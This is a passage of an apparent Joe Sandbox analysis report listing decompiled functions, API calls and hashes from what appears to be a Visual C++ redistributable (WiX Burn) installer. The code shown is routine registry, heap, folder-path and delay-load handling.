                                                                          • Instruction ID: 46657d43e3191e70f390d1fe261849649f404c38aef1e08d3ce1830199cd57e2
                                                                          • Opcode Fuzzy Hash: 733efcb49af034f6bf26c0d85967be9bd46235f59b9e67c8bbce16cd402678c1
                                                                          • Instruction Fuzzy Hash: A701D672E00625EE93614B9D9C84DB7B7ACFB8D7527104116F909D7610D378ACC0C7E2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00050E3F(void* _a4, short* _a8, int _a12, void** _a16) {
                                                                          				signed short _t5;
                                                                          				void* _t8;
                                                                          				signed short _t12;
                                                                          				int _t14;
                                                                          
                                                                          				_t14 = 0;
                                                                          				_t5 = RegOpenKeyExW(_a4, _a8, 0, _a12, _a16); // executed
                                                                          				_t12 = _t5;
                                                                          				_t8 =  <=  ? _t12 : _t12 & 0x0000ffff | 0x80070000;
                                                                          				if(_t8 != 0x80070002) {
                                                                          					if(_t12 != 0) {
                                                                          						_t14 =  >=  ? 0x80004005 : _t8;
                                                                          						E000137D3(0x80004005, "regutil.cpp", 0xa7, _t14);
                                                                          					}
                                                                          				} else {
                                                                          					_t14 = 0x80070002;
                                                                          				}
                                                                          				return _t14;
                                                                          			}








                                                                          APIs
                                                                          • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,00055699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 00050E52
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Open
                                                                          • String ID: regutil.cpp
                                                                          • API String ID: 71445658-955085611
                                                                          • Opcode ID: 26aae15d54b579bdade6e1856a7ef47251cac367098651a64499892e4c3cc6f2
                                                                          • Instruction ID: ab7d40d34688d682ed33dfc7781fa9525745c00b79f5135adccfc0ebd22485a5
                                                                          • Opcode Fuzzy Hash: 26aae15d54b579bdade6e1856a7ef47251cac367098651a64499892e4c3cc6f2
                                                                          • Instruction Fuzzy Hash: C1F0A7727011356BEF2449564C01BAB7DC5DF447A1F118524BD4DDA251D236CC1092D0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 58%
                                                                          			E00013A72(void* _a4, long _a8, signed int _a12) {
                                                                          				void* _t8;
                                                                          
                                                                          				asm("sbb eax, eax");
                                                                          				_t8 = RtlReAllocateHeap(GetProcessHeap(),  ~_a12 & 0x00000008, _a4, _a8); // executed
                                                                          				return _t8;
                                                                          			}

                                                                          APIs
                                                                          • GetProcessHeap.KERNEL32(?,000001C7,?,?,0001227D,?,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000), ref: 00013A86
                                                                          • RtlReAllocateHeap.NTDLL(00000000,?,0001227D,?,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 00013A8D
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocateProcess
                                                                          • String ID:
                                                                          • API String ID: 1357844191-0
                                                                          • Opcode ID: e75aa6fdfc01c109b8215c4c9b43ddf0ca59e7b661224a2e2cb39917be519d40
                                                                          • Instruction ID: be21f592a55ad616739a8d05fe8c3f0a316651d908b71ddb3288a1e7bace3ae3
                                                                          • Opcode Fuzzy Hash: e75aa6fdfc01c109b8215c4c9b43ddf0ca59e7b661224a2e2cb39917be519d40
                                                                          • Instruction Fuzzy Hash: E9D0C932150709AB9F405FE8DC09DAE3BACEB586137408405B915C2110CB3DE4609A64
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 72%
                                                                          			E00053499(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                          				signed int _v8;
                                                                          				intOrPtr _v16;
                                                                          				intOrPtr _v20;
                                                                          				intOrPtr _v28;
                                                                          				short _v30;
                                                                          				void _v32;
                                                                          				void* _v36;
                                                                          				intOrPtr _v40;
                                                                          				char _v44;
                                                                          				intOrPtr* _v48;
                                                                          				void* _v56;
                                                                          				short _v64;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t31;
                                                                          				void* _t39;
                                                                          				void* _t46;
                                                                          				void* _t48;
                                                                          				short _t49;
                                                                          				void* _t55;
                                                                          				intOrPtr* _t59;
                                                                          				signed int _t60;
                                                                          				void* _t65;
                                                                          				signed int _t74;
                                                                          				void* _t75;
                                                                          				void* _t76;
                                                                          
                                                                          				_t31 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t31 ^ _t74;
                                                                          				_v40 = _a4;
                                                                          				_v48 = _a12;
                                                                          				_t60 = 6;
                                                                          				memset( &_v32, 0, _t60 << 2);
                                                                          				_t76 = _t75 + 0xc;
                                                                          				_v36 = 0;
                                                                          				_v44 = 0;
                                                                          				__imp__#8( &_v64);
                                                                          				_t39 = E00052F23(0,  &_v36, 0); // executed
                                                                          				_t59 = _v36;
                                                                          				_t69 = 1;
                                                                          				_t71 =  ==  ? 0x80004005 : _t39;
                                                                          				if(( ==  ? 0x80004005 : _t39) >= 0) {
                                                                          					_t46 =  *((intOrPtr*)( *_t59 + 0x110))(_t59, 0);
                                                                          					_t71 = _t46;
                                                                          					if(_t46 >= 0) {
                                                                          						_t48 =  *((intOrPtr*)( *_t59 + 0x118))(_t59, 0);
                                                                          						_t71 = _t48;
                                                                          						if(_t48 >= 0) {
                                                                          							_t49 = 0x12;
                                                                          							_v30 = _t49;
                                                                          							_v20 = _v40;
                                                                          							_v32 = 1;
                                                                          							_v28 = 1;
                                                                          							_v16 = _a8;
                                                                          							_t69 = _t76 - 0x10;
                                                                          							_v64 = 0x2011;
                                                                          							_v56 =  &_v32;
                                                                          							asm("movsd");
                                                                          							asm("movsd");
                                                                          							asm("movsd");
                                                                          							asm("movsd"); // executed
                                                                          							_t55 =  *((intOrPtr*)( *_t59 + 0xe8))(_t59,  &_v44);
                                                                          							_t71 =  ==  ? 0x8007006e : _t55;
                                                                          							if(( ==  ? 0x8007006e : _t55) >= 0) {
                                                                          								 *_v48 = _t59;
                                                                          								_t59 = 0;
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				if(_t59 != 0) {
                                                                          					 *((intOrPtr*)( *_t59 + 8))(_t59);
                                                                          				}
                                                                          				return E0003DE36(_t59, _v8 ^ _t74, _t65, _t69, _t71);
                                                                          			}

                                                                          APIs
                                                                          • VariantInit.OLEAUT32(?), ref: 000534CE
                                                                            • Part of subcall function 00052F23: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,000534DF,00000000,?,00000000), ref: 00052F3D
                                                                            • Part of subcall function 00052F23: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,0003BDED,?,000152FD,?,00000000,?), ref: 00052F49
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorHandleInitLastModuleVariant
                                                                          • String ID:
                                                                          • API String ID: 52713655-0
                                                                          • Opcode ID: 8725502df5bda73bd2a45482b171a9041718c704d0d5538ea0efb8c542d20e1c
                                                                          • Instruction ID: 3a658705028cedeb75ccbe45b91c7435646de635f0a7127b1f079a03eb0ebe00
                                                                          • Opcode Fuzzy Hash: 8725502df5bda73bd2a45482b171a9041718c704d0d5538ea0efb8c542d20e1c
                                                                          • Instruction Fuzzy Hash: BB311C76E006199BCB11DFA8C884ADEF7F8EF08751F01456AED15FB311E6759E048BA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 95%
                                                                          			E00055728(void* __ecx, intOrPtr _a4, short* _a8, intOrPtr _a12, char** _a16) {
                                                                          				void* _v8;
                                                                          				void* _t13;
                                                                          				char** _t24;
                                                                          				void* _t27;
                                                                          
                                                                          				_push(__ecx);
                                                                          				_v8 = 0;
                                                                          				_t13 = E00055664(__ecx, _a4,  &_v8); // executed
                                                                          				_t24 = _a16;
                                                                          				_t27 = _t13;
                                                                          				if(_t27 == 0x80070002 || _t27 == 0x80070003) {
                                                                          					L5:
                                                                          					_t27 = 1;
                                                                          					goto L6;
                                                                          				} else {
                                                                          					if(_t27 < 0) {
                                                                          						L6:
                                                                          						if(_v8 != 0) {
                                                                          							RegCloseKey(_v8);
                                                                          							_v8 = 0;
                                                                          						}
                                                                          						if(_t27 == 1 || _t27 < 0) {
                                                                          							if(_a12 != 0) {
                                                                          								_t27 = E000121A5(_t24, _a12, 0);
                                                                          							} else {
                                                                          								if( *_t24 != 0) {
                                                                          									E000554EF( *_t24);
                                                                          									 *_t24 = 0;
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          						return _t27;
                                                                          					}
                                                                          					_t27 = E00050F6E(_v8, _a8, _t24);
                                                                          					if(_t27 == 0x80070002 || _t27 == 0x80070003) {
                                                                          						goto L5;
                                                                          					} else {
                                                                          						goto L6;
                                                                          					}
                                                                          				}
                                                                          			}

                                                                          APIs
                                                                          • RegCloseKey.ADVAPI32(80070490,00000000,80070490,0007AAA0,00000000,80070490,00000000,?,0002890E,WiX\Burn,PackageCache,00000000,0007AAA0,00000000,00000000,80070490), ref: 00055782
                                                                            • Part of subcall function 00050F6E: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00050FE4
                                                                            • Part of subcall function 00050F6E: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 0005101F
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue$Close
                                                                          • String ID:
                                                                          • API String ID: 1979452859-0
                                                                          • Opcode ID: 70e6627db2ed79aa38a53d064a16ae6ffae6db4f6594bd7e2964536954b8da0f
                                                                          • Instruction ID: 1972c38a75a502f1f9ccca57ed870694d0f80428288339a41573924c215e985e
                                                                          • Opcode Fuzzy Hash: 70e6627db2ed79aa38a53d064a16ae6ffae6db4f6594bd7e2964536954b8da0f
                                                                          • Instruction Fuzzy Hash: 1F11C23680462DEBCF21AEA4ECA59EFB6A9EB0C323B150279ED0167111D3324D54DAD0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 95%
                                                                          			E0004523F(void* __ecx, signed int _a4, signed int _a8) {
                                                                          				void* _t8;
                                                                          				void* _t12;
                                                                          				signed int _t13;
                                                                          				void* _t15;
                                                                          				signed int _t16;
                                                                          				signed int _t18;
                                                                          				long _t19;
                                                                          
                                                                          				_t15 = __ecx;
                                                                          				_t18 = _a4;
                                                                          				if(_t18 == 0) {
                                                                          					L2:
                                                                          					_t19 = _t18 * _a8;
                                                                          					if(_t19 == 0) {
                                                                          						_t19 = _t19 + 1;
                                                                          					}
                                                                          					while(1) {
                                                                          						_t8 = RtlAllocateHeap( *0x7b5b8, 8, _t19); // executed
                                                                          						if(_t8 != 0) {
                                                                          							break;
                                                                          						}
                                                                          						__eflags = E00044A8E();
                                                                          						if(__eflags == 0) {
                                                                          							L8:
                                                                          							 *((intOrPtr*)(E00043E36())) = 0xc;
                                                                          							__eflags = 0;
                                                                          							return 0;
                                                                          						}
                                                                          						_t12 = E00044ADD(_t15, _t16, __eflags, _t19);
                                                                          						_pop(_t15);
                                                                          						__eflags = _t12;
                                                                          						if(_t12 == 0) {
                                                                          							goto L8;
                                                                          						}
                                                                          					}
                                                                          					return _t8;
                                                                          				}
                                                                          				_t13 = 0xffffffe0;
                                                                          				_t16 = _t13 % _t18;
                                                                          				if(_t13 / _t18 < _a8) {
                                                                          					goto L8;
                                                                          				}
                                                                          				goto L2;
                                                                          			}











                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00046113,00000001,00000364), ref: 00045280
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          • Opcode ID: aeadb455809f092d832be1fdc03fb1a5bded98e9e91a3b7c3860488b9de4f52e
                                                                          • Instruction ID: f8fdc5202438e77d37b5709cdce39d0378ee213a12a186c59300e1965c8e0c81
                                                                          • Opcode Fuzzy Hash: aeadb455809f092d832be1fdc03fb1a5bded98e9e91a3b7c3860488b9de4f52e
                                                                          • Instruction Fuzzy Hash: 01F0BBB564492467ABB16A614E05B5F37889F43762B184133EC04AB183DBA0DC0546DD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,000289CA,0000001C,80070490,00000000,00000000,80070490), ref: 000134E5
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: FolderPath
                                                                          • String ID:
                                                                          • API String ID: 1514166925-0
                                                                          • Opcode ID: 3b847faf9bf1ee29f96150c6eea795d5692b85ac2a66ed0152eff036378fdaac
                                                                          • Instruction ID: 90a23fca0b159d853829302cd5dfc5f31867f0cca6e27be19586fb4047ac8c91
                                                                          • Opcode Fuzzy Hash: 3b847faf9bf1ee29f96150c6eea795d5692b85ac2a66ed0152eff036378fdaac
                                                                          • Instruction Fuzzy Hash: 48E01272201225BBEB022EA65C05DEB7B9CDF057507008451BE40E6011E765FA9086F0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00052DD0() {
                                                                          				struct HINSTANCE__* _t1;
                                                                          
                                                                          				_t1 =  *0x7b680; // 0x0
                                                                          				if(_t1 != 0) {
                                                                          					_t1 = FreeLibrary(_t1); // executed
                                                                          					 *0x7b680 = 0;
                                                                          					 *0x7b6bc = 0;
                                                                          					 *0x7b6b8 = 0;
                                                                          					 *0x7b6b4 = 0;
                                                                          					 *0x7b6b0 = 0;
                                                                          					 *0x7b6ac = 0;
                                                                          					 *0x7b6a8 = 0;
                                                                          					 *0x7b6c0 = 0;
                                                                          				}
                                                                          				 *0x7b6c4 = 0;
                                                                          				return _t1;
                                                                          			}





                                                                          APIs
                                                                          • FreeLibrary.KERNELBASE(00000000,00000000,0001547B,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00052DDD
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: FreeLibrary
                                                                          • String ID:
                                                                          • API String ID: 3664257935-0
                                                                          • Opcode ID: 974af3f3f641e407b2a2d5c545ed580c6b43277e55e956896c8565318acf44d1
                                                                          • Instruction ID: 04ab21ef23d650ef04b463cac5bf9f621f796f5083b283c8b29bc0d74b9574bc
                                                                          • Opcode Fuzzy Hash: 974af3f3f641e407b2a2d5c545ed580c6b43277e55e956896c8565318acf44d1
                                                                          • Instruction Fuzzy Hash: C6E0F6F5D262289AAB50AF59BD486427FB8BB08B41321465FF608F2260C3BC54808FA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 37%
                                                                          			E0004F349() {
                                                                          				void* _t3;
                                                                          				void* _t5;
                                                                          				void* _t7;
                                                                          
                                                                          				_push(_t3);
                                                                          				_push(_t5);
                                                                          				E00059814(_t3, _t5, _t7, 0x78024, 0x7a94c); // executed
                                                                          				goto __eax;
                                                                          			}







                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0004F35B
                                                                            • Part of subcall function 00059814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00059891
                                                                            • Part of subcall function 00059814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000598A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: a6c15b8230bb0f3d25c7727e70e84b10804708b6576308a1f831200f09852bfb
                                                                          • Instruction ID: 892fd56f6b63ce80a6b4576ad43bdbf4ce6f35e8b439df9040ed6ae2c9cafbb2
                                                                          • Opcode Fuzzy Hash: a6c15b8230bb0f3d25c7727e70e84b10804708b6576308a1f831200f09852bfb
                                                                          • Instruction Fuzzy Hash: FCB012D2B98402BC32441310AC0AC3F020CC3C2F26334D03ABB04C4041EC8C0E0A503A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 37%
                                                                          			E0004F36A() {
                                                                          				void* _t3;
                                                                          				void* _t5;
                                                                          				void* _t7;
                                                                          
                                                                          				_push(_t3);
                                                                          				_push(_t5);
                                                                          				E00059814(_t3, _t5, _t7, 0x78024, 0x7a944); // executed
                                                                          				goto __eax;
                                                                          			}







                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0004F35B
                                                                            • Part of subcall function 00059814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00059891
                                                                            • Part of subcall function 00059814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000598A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: 869b58cff6e9306e9f7c91486fa7514f3beb612533a7381ed845f3343cfff2a9
                                                                          • Instruction ID: 8e9b8a1fa0fce7b1cc5bf474d6cc76d03c35a1fe6f366b72f305c2fd95fc4f64
                                                                          • Opcode Fuzzy Hash: 869b58cff6e9306e9f7c91486fa7514f3beb612533a7381ed845f3343cfff2a9
                                                                          • Instruction Fuzzy Hash: A0B012D1B98402BD328453145D0BC3F014CC3C6F22334D03AB608C5141EC8C0D0B513A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 37%
                                                                          			E0004F37A() {
                                                                          				void* _t3;
                                                                          				void* _t5;
                                                                          				void* _t7;
                                                                          
                                                                          				_push(_t3);
                                                                          				_push(_t5);
                                                                          				E00059814(_t3, _t5, _t7, 0x78024, 0x7a948); // executed
                                                                          				goto __eax;
                                                                          			}







                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0004F35B
                                                                            • Part of subcall function 00059814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00059891
                                                                            • Part of subcall function 00059814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000598A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: 4074e69a20df4385c0dc583888291be456d35d19b9c169e69cabbad4040a938e
                                                                          • Instruction ID: ed056f970139a3727e84ef7d4bdddbb006887637b8ff0f9cb6f5116ebbf8163d
                                                                          • Opcode Fuzzy Hash: 4074e69a20df4385c0dc583888291be456d35d19b9c169e69cabbad4040a938e
                                                                          • Instruction Fuzzy Hash: 60B012D1B98502BC328453145C0AC3F014CC3C6F23334D13AF608C5141EC880D4A513A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 37%
                                                                          			E000594D5() {
                                                                          				void* _t3;
                                                                          				void* _t5;
                                                                          				void* _t7;
                                                                          
                                                                          				_push(_t3);
                                                                          				_push(_t5);
                                                                          				E00059814(_t3, _t5, _t7, 0x780c4, 0x7a960); // executed
                                                                          				goto __eax;
                                                                          			}







                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000594E7
                                                                            • Part of subcall function 00059814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00059891
                                                                            • Part of subcall function 00059814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000598A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: 435778e52b80b9aef6aca76bba25d290f7940a84cae6f46e86e52d27f6d80602
                                                                          • Instruction ID: d6abdb27ca8f2d4d77aca5f1b6cdf8c18fa32a00ad73043a61eb1f983d1947ce
                                                                          • Opcode Fuzzy Hash: 435778e52b80b9aef6aca76bba25d290f7940a84cae6f46e86e52d27f6d80602
                                                                          • Instruction Fuzzy Hash: D3B01285BA8601FC329422145C46C7F010CD7C1F12330C22ABB04D5081AC480C0E5137
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 37%
                                                                          			E000594F6() {
                                                                          				void* _t3;
                                                                          				void* _t5;
                                                                          				void* _t7;
                                                                          
                                                                          				_push(_t3);
                                                                          				_push(_t5);
                                                                          				E00059814(_t3, _t5, _t7, 0x780c4, 0x7a95c); // executed
                                                                          				goto __eax;
                                                                          			}







                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000594E7
                                                                            • Part of subcall function 00059814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00059891
                                                                            • Part of subcall function 00059814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000598A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: 28800a3da01efbcfe587b60163f06619f965fd2e65e265fcba8f778b17a4d152
                                                                          • Instruction ID: d751602cfac4edb5e9f87c41b7c376d17310bcafdc96869bbfabc6f342aaaa34
                                                                          • Opcode Fuzzy Hash: 28800a3da01efbcfe587b60163f06619f965fd2e65e265fcba8f778b17a4d152
                                                                          • Instruction Fuzzy Hash: 11B01285FA8502EC329462145C07C7F010CC3C1F12330C22ABF08C61C1EC480C1E5136
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 37%
                                                                          			E00059506() {
                                                                          				void* _t3;
                                                                          				void* _t5;
                                                                          				void* _t7;
                                                                          
